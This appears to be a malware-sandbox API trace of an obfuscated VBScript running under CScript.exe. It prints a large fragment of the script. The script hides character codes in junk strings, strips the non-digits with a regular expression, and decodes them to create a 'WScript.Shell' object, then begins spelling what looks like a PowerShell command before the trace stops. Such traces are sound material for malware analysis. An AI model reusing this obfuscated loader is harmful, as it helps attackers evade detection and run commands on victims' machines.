	[0033.917] wcsncmp (_String1="x\"\r\ngvwuzbz = -56051\r\nuvjivfee.Pa", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107
	[0033.918] wcsncmp (_String1="\"\r\ngvwuzbz = -56051\r\nuvjivfee.Pat", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21
	[0033.918] wcsncmp (_String1="\r\ngvwuzbz = -56051\r\nuvjivfee.Patt", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 64
	[0033.918] wcsncmp (_String1="\ngvwuzbz = -56051\r\nuvjivfee.Patte", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3
	[0033.918] wcsncmp (_String1="gvwuzbz = -56051\r\nuvjivfee.Patter", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 90
	[0033.918] wcsncmp (_String1="vwuzbz = -56051\r\nuvjivfee.Pattern", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 105
	[0033.918] wcsncmp (_String1="wuzbz = -56051\r\nuvjivfee.Pattern ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106
	[0033.918] wcsncmp (_String1="uzbz = -56051\r\nuvjivfee.Pattern =", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104
	[0033.918] wcsncmp (_String1="zbz = -56051\r\nuvjivfee.Pattern = ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 109
	[0033.918] wcsncmp (_String1="bz = -56051\r\nuvjivfee.Pattern = \"", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85
	[0033.918] wcsncmp (_String1="z = -56051\r\nuvjivfee.Pattern = \"[", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 109
	[0033.918] wcsncmp (_String1=" = -56051\r\nuvjivfee.Pattern = \"[^", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.918] wcsncmp (_String1="= -56051\r\nuvjivfee.Pattern = \"[^0", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48
	[0033.918] wcsncmp (_String1=" -56051\r\nuvjivfee.Pattern = \"[^0-", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.918] wcsncmp (_String1="-56051\r\nuvjivfee.Pattern = \"[^0-9", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 32
	[0033.918] wcsncmp (_String1="56051\r\nuvjivfee.Pattern = \"[^0-9]", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 40
	[0033.918] wcsncmp (_String1="6051\r\nuvjivfee.Pattern = \"[^0-9]\"", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 41
	[0033.918] wcsncmp (_String1="051\r\nuvjivfee.Pattern = \"[^0-9]\"\r", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 35
	[0033.918] wcsncmp (_String1="51\r\nuvjivfee.Pattern = \"[^0-9]\"\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 40
	[0033.918] wcsncmp (_String1="1\r\nuvjivfee.Pattern = \"[^0-9]\"\r\ns", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36
	[0033.918] wcsncmp (_String1="\r\nuvjivfee.Pattern = \"[^0-9]\"\r\nst", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 78
	[0033.918] wcsncmp (_String1="\nuvjivfee.Pattern = \"[^0-9]\"\r\nstj", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3
	[0033.918] wcsncmp (_String1="uvjivfee.Pattern = \"[^0-9]\"\r\nstjh", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104
	[0033.918] wcsncmp (_String1="vjivfee.Pattern = \"[^0-9]\"\r\nstjhf", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 105
	[0033.918] wcsncmp (_String1="jivfee.Pattern = \"[^0-9]\"\r\nstjhff", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 93
	[0033.918] wcsncmp (_String1="ivfee.Pattern = \"[^0-9]\"\r\nstjhff ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92
	[0033.918] wcsncmp (_String1="vfee.Pattern = \"[^0-9]\"\r\nstjhff =", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 105
	[0033.918] wcsncmp (_String1="fee.Pattern = \"[^0-9]\"\r\nstjhff = ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 89
	[0033.919] SetLastError (dwErrCode=0xb) 
	[0033.919] GetLastError () returned 0xb
	[0033.919] SetLastError (dwErrCode=0xb) 
	[0033.920] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1
	[0033.920] CloseCodeAuthzLevel () returned 0x1
	[0033.920] FreeLibrary (hLibModule=0x7ffc154e0000) returned 1
	[0033.920] SysStringLen (param_1="sbgudecc = -17979\r\nsfzzyjdhz = \"\"\r\nbzagxye = \"e0t0t7x2u\"\r\nisaeac = \"\"\r\nujwjiv = -80055\r\nzjhexcv = 0\r\nevtfga = 141\r\nzdgbwyx = \"e cy1y1e3\"\r\nSet uvjivfee = NEW RegExp\r\nbdhdga = \"ajscw hi\"\r\nbejugg = true\r\nvswdjegxt = \"6uag0 ax\"\r\ngvwuzbz = -56051\r\nuvjivfee.Pattern = \"[^0-9]\"\r\nstjhff = -94464\r\nfzbutew = \"\"\r\njjvxsdhst = -88409\r\nfxzzwgey = \"\"\r\nccssxv = -66192\r\nuvjivfee.Global = True\r\nfvuhje = \"wb7yvad3c\"\r\nyzwfwhfav = \"01bfdyb \"\r\nuubwyeueb = \"\"\r\naiwejax = -97152\r\nztczasg = \"ucv yt \"\r\netvtej = -59959\r\nwcxjdda = \"uzxihu87autihixy\"\r\nvsyihygdt = \"vvtycv\"\r\nyxbgavtw = uvjivfee.Replace(wcxjdda , sfzzyjdhz ) \r\nffhjhjs = -38700\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(yxbgavtw)\r\nbbhciu = \"sdtty0\"\r\nxzhsyhcxt = \"jeix0t1x\"\r\ngecivguu = \"d0saw0f2a\"\r\njshisfa = -29787\r\ncsyexsged = \"gvbhtj83eszwfyigh\"\r\nbyzashg = \"diafe7df\"\r\nbwgivt = uvjivfee.Replace(csyexsged , sfzzyjdhz ) \r\nsczxta = -54162\r\nxyxtzhwg = \"e98 9 6\"\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(bwgivt)\r\nfcwiii = 8113\r\nscyaes = \"x6ujvww\"\r\nsjvavejau = \"cfxyhxha99fhcyjxjvc\"\r\nxccfce = 5456\r\nuzbjuid = uvjivfee.Replace(sjvavejau , sfzzyjdhz ) \r\ntwvefhgec = \"vv5z9z\"\r\nwdufww = \"4 4t3fe\"\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(uzbjuid)\r\ngddsaxdsd = \"5z1bghh y\"\r\nzxvgug = 4105\r\neeijfxwv = \"89 a dg2e\"\r\niwadwajc = \"uhvhfsaix114echccdc\"\r\ndgxhaxd = -47193\r\nvehgaavjx = uvjivfee.Replace(iwadwajc , sfzzyjdhz ) \r\nfswdcjgvb = -70420\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(vehgaavjx)\r\nwyeixa = \"7viwgetx\"\r\nfjtwwgvau = \"f5ja9v9ia\"\r\nytwxthv = -35754\r\nzjdcaxi = -77819\r\nivwsvt = \"awgtubvj105ssgjscfiz\"\r\nwievsjs = \"jaxy06\"\r\nscbafxs = -41247\r\nvxcheved = uvjivfee.Replace(ivwsvt , sfzzyjdhz ) \r\ndzgctyecj = \"284jh0 wc\"\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(vxcheved)\r\nwahyui = -81116\r\nehaszxivz = -50167\r\njziaythb = \"iizybf112xcdexhsub\"\r\nbssxsxgj = -42090\r\nidxzas = -89913\r\nfyfthee = uvjivfee.Replace(jziaythb , sfzzyjdhz ) \r\nbvugjsu = -22034\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(fyfthee)\r\nivtyua = \"b0szf3vuy\"\r\nvgacgxvjx = \"5i c8730\"\r\nshswbeav = \"a1bzfi\"\r\nzcwxiewaj = \"hafsxs116zhshatcz\"\r\nzwxvbttsw = -88567\r\ndavidijg = \"u3wbyu\"\r\nwshthse = uvjivfee.Replace(zcwxiewaj , sfzzyjdhz ) \r\ngvwtdjj = \"hab 1cv\"\r\nvybbhuwy = \"h4cji86\"\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(wshthse)\r\nvigjiy = \"sibxf2w 1\"\r\ndayhdg = \"8x zbi5\"\r\ntzbujizjw = -75329\r\nezziddgz = \"gaysfa46wufecgbj\"\r\niiidgd = -50070\r\nzjfahzati = \"g3d0y6azw\"\r\nuxazfjyx = uvjivfee.Replace(ezziddgz , sfzzyjdhz ) \r\nfwdjyyw = \"aiyz y\"\r\ngfcaevd = \"dvu47hf3y\"\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(uxazfjyx)\r\nuetgwgxt = \"byhzi9a2c\"\r\nxtiwtba = \" 5 eiuw\"\r\nttyghaye = \"czbg  \"\r\nawfgeejje = \"ueibhwgt83ysdzfh\"\r\nibdxuthu = -26603\r\nvbwfwj = \"bzjj4z0\"\r\ndyhtey = uvjivfee.Replace(awfgeejje , sfzzyjdhz ) \r\natufhi = \"tevg7y\"\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(dyhtey)\r\nwybbuws = \"aycfvx \"\r\neifdgwfw = -6307\r\ntxybtht = \"y hwwzhx\"\r\nsevjcv = \"wcdeighds104xiayjwtv\"\r\ndujywdzg = -76026\r\ncwucdjtg = \"yi04xj76\"\r\nctiwgg = uvjivfee.Replace(sevjcv , sfzzyjdhz ) \r\njtejueug = \" 7ct7z h \"\r\nujdvjbfs = -82103\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(ctiwgg)\r\nuzydgwhda = -59540\r\neztwjyiab = \"9z6ygeedv\"\r\nydjxwchax = \"gesyexfg101jjzaxuy\"\r\nexuiyei = -55195\r\nufsysghy = -12781\r\niwijxhaew = uvjivfee.Replace(ydjxwchax , sfzzyjdhz ) \r\nijbhhttc = -23095\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(iwijxhaew)\r\nzybtxbzsc = -97143\r\niivxajtz = \"4hhaxw\"\r\ndxswgsjyf = -81161\r\ngtfvsca = \"huc16c0w\"\r\niajixt = \"wfzsatbv108fdwbzaf\"\r\nytuzswah = -51395\r\ngtaigbzeg = \"wh82f47\"\r\nvjwidez = uvjivfee.Replace(iajixt , sfzzyjdhz ) \r\nwgsbixz = \"cat7v1\"\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(vjwidez)\r\njjtdyxzt = \"y3j44tx3t\"\r\nfchvseew = \"e9 sg8xa\"\r\niscbzisbz = -23033\r\nfiwcfe = \"fjfhzcxgb108svfighi\"\r\niftjygv = -10944\r\nhfbjbagg = -90570\r\newyfshx = uvjivfee.Replace(fiwcfe , sfzzyjdhz ) \r\nwuuxswz = -96005\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(ewyfshx)\r\nfuzuyhgdu = \"u11iyzt11\"\r\nSet suuztta = CreateObject(uubwyeueb) \r\nttabadwff = -12181\r\nvshvxwbyy = \"szjbagje112aexgtehx\"\r\nijzeea = -71544\r\nicuziffy = -84863\r\nubyaifcvs = uvjivfee.Replace(vshvxwbyy , sfzzyjdhz ) \r\nhbcwswbi = \"fgjiy4y\"\r\nisaeac = fzbutew& fxzzwgey &  isaeac & Chr(ubyaifcvs)\r\nfccjjuj = -8802\r\nthwvhjaua = \" if1gj1v\"\r\nfdzxyegyf = -42521\r\ngfytux = \"tgfssd111uzjsfdd\"\r\nyfttdvuxf = \"95gw fccu\"\r\nxvbxjesig = uvjivfee.Replace(gfytux , sfzzyjdhz ) \r\nxgzzbdv = -81788\r\nivwywgc = -97799\r\nisaeac = fzbutew& fxzzwgey &  isaeac & Chr(xvbxjesig)\r\nxfvcviie = -67808\r\nzcvbbxja = \"6h5tss11\"\r\nudaihs = \"jbuwhhs119ubxuhvw\"\r\ntizehif = \"bfus  z3\"\r\ngvvzsvsbe = uvjivfee.Replace(udaihs , sfzzyjdhz ) \r\ntyfxxe = -11438\r\nzgawsvfhz = -98684\r\nisaeac = fzbutew& fxzzwgey &  isaeac & Chr(gvvzsvsbe)\r\njefhua = \"ijdvgx7\"\r\ncihwassgi = \"jdhu5j\"\r\nywhtgjtgb = \"zxcbiiwcz101csuzsf\"\r\nyhjvvjcd = -76182\r\netadzetz = -12214\r\nsabiuwd = uvjivfee.Replace(ywhtgjtgb , sfzzyjdhz ) \r\nxyyscz = -42305\r\nisaeac = fzbutew& fxzzwgey &  isaeac & Chr(sabiuwd)\r\nibctbg = -33449\r\nuecuyz = \"91 yuy\"\r\njybcjch = \"xd4xa8x\"\r\ncxbczax = -21427\r\nuzhhwci = \"yeshay114iwcxgj\"\r\nvjtcxxeb = -95754\r\nvjgfeasd = -149\r\ntsfgetv = uvjivfee.Replace(uzhhwci , s") returned 0x1cb27
	[0033.923] GetCurrentThreadId () returned 0xd50
	[0033.999] ISystemDebugEventFire:IsActive (This=0x1288139c0c0) returned 0x1
	[0034.001] _wcsicmp (_String1="regexp", _String2="RegExp") returned 0
	[0034.001] LoadRegTypeLib (in: rguid=0x7ffbf8f00420*(Data1=0x3f4daca7, Data2=0x160d, Data3=0x11d2, Data4=([0]=0xa8, [1]=0xe9, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0x36, [6]=0x5c, [7]=0x9f)), wVerMajor=0x5, wVerMinor=0x5, lcid=0x0, pptlib=0x17eed7e340*=0x0 | out: pptlib=0x17eed7e340*=0x1288356a210) returned 0x0
	[0034.007] ITypeLib:GetTypeInfoOfGuid (in: This=0x1288356a210, GUID=0x7ffbf8f00430*(Data1=0x3f4dacb0, Data2=0x160d, Data3=0x11d2, Data4=([0]=0xa8, [1]=0xe9, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0x36, [6]=0x5c, [7]=0x9f)), ppTInfo=0x128815a72c8 | out: ppTInfo=0x128815a72c8*=0x1288356a4d8) returned 0x0
	[0034.007] ITypeLib:GetTypeInfoOfGuid (in: This=0x1288356a210, GUID=0x7ffbf8effcf0*(Data1=0x3f4daca4, Data2=0x160d, Data3=0x11d2, Data4=([0]=0xa8, [1]=0xe9, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0x36, [6]=0x5c, [7]=0x9f)), ppTInfo=0x128815a72c0 | out: ppTInfo=0x128815a72c0*=0x1288356a588) returned 0x0
	[0034.007] ITypeLib:GetTypeInfoOfGuid (in: This=0x1288356a210, GUID=0x7ffbf8f004a0*(Data1=0x3f4dacb1, Data2=0x160d, Data3=0x11d2, Data4=([0]=0xa8, [1]=0xe9, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0x36, [6]=0x5c, [7]=0x9f)), ppTInfo=0x128815a72d0 | out: ppTInfo=0x128815a72d0*=0x1288356a5e0) returned 0x0
	[0034.007] ITypeLib:GetTypeInfoOfGuid (in: This=0x1288356a210, GUID=0x7ffbf8f00440*(Data1=0x3f4daca5, Data2=0x160d, Data3=0x11d2, Data4=([0]=0xa8, [1]=0xe9, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0x36, [6]=0x5c, [7]=0x9f)), ppTInfo=0x128815a72d8 | out: ppTInfo=0x128815a72d8*=0x1288356a690) returned 0x0
	[0034.007] ITypeLib:GetTypeInfoOfGuid (in: This=0x1288356a210, GUID=0x7ffbf8f00450*(Data1=0x3f4dacb2, Data2=0x160d, Data3=0x11d2, Data4=([0]=0xa8, [1]=0xe9, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0x36, [6]=0x5c, [7]=0x9f)), ppTInfo=0x128815a72e0 | out: ppTInfo=0x128815a72e0*=0x1288356a6e8) returned 0x0
	[0034.007] ITypeLib:GetTypeInfoOfGuid (in: This=0x1288356a210, GUID=0x7ffbf8f00470*(Data1=0x3f4daca6, Data2=0x160d, Data3=0x11d2, Data4=([0]=0xa8, [1]=0xe9, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0x36, [6]=0x5c, [7]=0x9f)), ppTInfo=0x128815a72e8 | out: ppTInfo=0x128815a72e8*=0x1288356a798) returned 0x0
	[0034.007] ITypeLib:GetTypeInfoOfGuid (in: This=0x1288356a210, GUID=0x7ffbf8f00460*(Data1=0x3f4dacb3, Data2=0x160d, Data3=0x11d2, Data4=([0]=0xa8, [1]=0xe9, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0x36, [6]=0x5c, [7]=0x9f)), ppTInfo=0x128815a72f0 | out: ppTInfo=0x128815a72f0*=0x1288356a7f0) returned 0x0
	[0034.007] ITypeLib:GetTypeInfoOfGuid (in: This=0x1288356a210, GUID=0x7ffbf8f00480*(Data1=0x3f4dacc0, Data2=0x160d, Data3=0x11d2, Data4=([0]=0xa8, [1]=0xe9, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0x36, [6]=0x5c, [7]=0x9f)), ppTInfo=0x128815a72f8 | out: ppTInfo=0x128815a72f8*=0x12881395548) returned 0x0
	[0034.007] IUnknown:Release (This=0x1288356a210) returned 0x8
	[0034.008] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.009] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.009] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.009] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.009] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.010] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.010] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.010] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.011] SysStringLen (param_1="uzxihu87autihixy") returned 0x10
	[0034.011] GetUserDefaultLCID () returned 0x409
	[0034.011] SysStringLen (param_1="") returned 0x0
	[0034.028] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.028] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.028] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.028] SysStringLen (param_1="gvbhtj83eszwfyigh") returned 0x11
	[0034.028] GetUserDefaultLCID () returned 0x409
	[0034.029] SysStringLen (param_1="") returned 0x0
	[0034.030] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.030] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.030] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.030] SysStringLen (param_1="cfxyhxha99fhcyjxjvc") returned 0x13
	[0034.030] GetUserDefaultLCID () returned 0x409
	[0034.030] SysStringLen (param_1="") returned 0x0
	[0034.031] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.031] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.031] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.031] SysStringLen (param_1="uhvhfsaix114echccdc") returned 0x13
	[0034.031] GetUserDefaultLCID () returned 0x409
	[0034.031] SysStringLen (param_1="") returned 0x0
	[0034.032] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.032] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.032] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.032] SysStringLen (param_1="awgtubvj105ssgjscfiz") returned 0x14
	[0034.032] GetUserDefaultLCID () returned 0x409
	[0034.032] SysStringLen (param_1="") returned 0x0
	[0034.034] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.035] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.035] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.035] SysStringLen (param_1="iizybf112xcdexhsub") returned 0x12
	[0034.035] GetUserDefaultLCID () returned 0x409
	[0034.035] SysStringLen (param_1="") returned 0x0
	[0034.036] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.036] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.036] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.036] SysStringLen (param_1="hafsxs116zhshatcz") returned 0x11
	[0034.036] GetUserDefaultLCID () returned 0x409
	[0034.036] SysStringLen (param_1="") returned 0x0
	[0034.037] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.037] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.037] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.037] SysStringLen (param_1="gaysfa46wufecgbj") returned 0x10
	[0034.037] GetUserDefaultLCID () returned 0x409
	[0034.037] SysStringLen (param_1="") returned 0x0
	[0034.039] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.039] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.039] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.039] SysStringLen (param_1="ueibhwgt83ysdzfh") returned 0x10
	[0034.039] GetUserDefaultLCID () returned 0x409
	[0034.039] SysStringLen (param_1="") returned 0x0
	[0034.040] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.040] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.040] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.040] SysStringLen (param_1="wcdeighds104xiayjwtv") returned 0x14
	[0034.040] GetUserDefaultLCID () returned 0x409
	[0034.040] SysStringLen (param_1="") returned 0x0
	[0034.041] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.041] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.041] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.041] SysStringLen (param_1="gesyexfg101jjzaxuy") returned 0x12
	[0034.041] GetUserDefaultLCID () returned 0x409
	[0034.041] SysStringLen (param_1="") returned 0x0
	[0034.043] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.043] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.043] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.043] SysStringLen (param_1="wfzsatbv108fdwbzaf") returned 0x12
	[0034.043] GetUserDefaultLCID () returned 0x409
	[0034.043] SysStringLen (param_1="") returned 0x0
	[0034.044] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.044] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.044] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.044] SysStringLen (param_1="fjfhzcxgb108svfighi") returned 0x13
	[0034.044] GetUserDefaultLCID () returned 0x409
	[0034.044] SysStringLen (param_1="") returned 0x0
	[0034.045] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x17eed7e220 | out: lpclsid=0x17eed7e220*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
	[0034.046] SysStringLen (param_1=0x0) returned 0x0
	[0034.046] CoGetClassObject (in: rclsid=0x17eed7e220*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffbf8effce0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x17eed7e1e0 | out: ppv=0x17eed7e1e0*=0x128815a9220) returned 0x0
	[0034.476] GetVersionExA (in: lpVersionInformation=0x17eed7bda0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7ffb, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x17eed7bda0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0034.476] GetUserDefaultLCID () returned 0x409
	[0034.476] GetLocaleInfoW (in: Locale=0x409, LCType=0x20000070, lpLCData=0x17eed7b910, cchData=2 | out: lpLCData="") returned 2
	[0034.476] DllGetClassObject (in: rclsid=0x1288139f900*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), riid=0x17eed7dbc0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x17eed7cdb0 | out: ppv=0x17eed7cdb0*=0x128815a9220) returned 0x0
	[0034.476] WshShell:IUnknown:AddRef (This=0x128815a9220) returned 0x2
	[0034.476] WshShell:IUnknown:Release (This=0x128815a9220) returned 0x1
	[0034.476] WshShell:IUnknown:QueryInterface (in: This=0x128815a9220, riid=0x7ffbf8effce0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x17eed7ded0 | out: ppvObject=0x17eed7ded0*=0x128815a9220) returned 0x0
	[0034.476] WshShell:IUnknown:Release (This=0x128815a9220) returned 0x1
	[0034.476] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x17eed7e000, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\CScript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")) returned 0x1f
	[0034.477] _strcmpi (_Str1="\\CScript.exe", _Str2="\\wscript.exe") returned -20
	[0034.477] _strcmpi (_Str1="\\CScript.exe", _Str2="\\cscript.exe") returned 0
	[0034.477] GetModuleHandleA (lpModuleName=0x0) returned 0x7ff6c3d30000
	[0034.477] GetProcAddress (hModule=0x7ff6c3d30000, lpProcName=0x1) returned 0x7ff6c3d31250
	[0034.477] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.477] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.477] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.477] SysStringLen (param_1="szjbagje112aexgtehx") returned 0x13
	[0034.477] GetUserDefaultLCID () returned 0x409
	[0034.477] SysStringLen (param_1="") returned 0x0
	[0034.478] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.479] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.479] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.479] SysStringLen (param_1="tgfssd111uzjsfdd") returned 0x10
	[0034.479] GetUserDefaultLCID () returned 0x409
	[0034.479] SysStringLen (param_1="") returned 0x0
	[0034.480] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.480] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.480] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.480] SysStringLen (param_1="jbuwhhs119ubxuhvw") returned 0x11
	[0034.480] GetUserDefaultLCID () returned 0x409
	[0034.480] SysStringLen (param_1="") returned 0x0
	[0034.483] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.484] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.484] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.484] SysStringLen (param_1="zxcbiiwcz101csuzsf") returned 0x12
	[0034.484] GetUserDefaultLCID () returned 0x409
	[0034.484] SysStringLen (param_1="") returned 0x0
	[0034.485] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.485] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.485] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.485] SysStringLen (param_1="yeshay114iwcxgj") returned 0xf
	[0034.485] GetUserDefaultLCID () returned 0x409
	[0034.485] SysStringLen (param_1="") returned 0x0
	[0034.486] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.486] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.486] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.486] SysStringLen (param_1="ejwgaihes115bjsddw") returned 0x12
	[0034.486] GetUserDefaultLCID () returned 0x409
	[0034.486] SysStringLen (param_1="") returned 0x0
	[0034.487] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.487] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
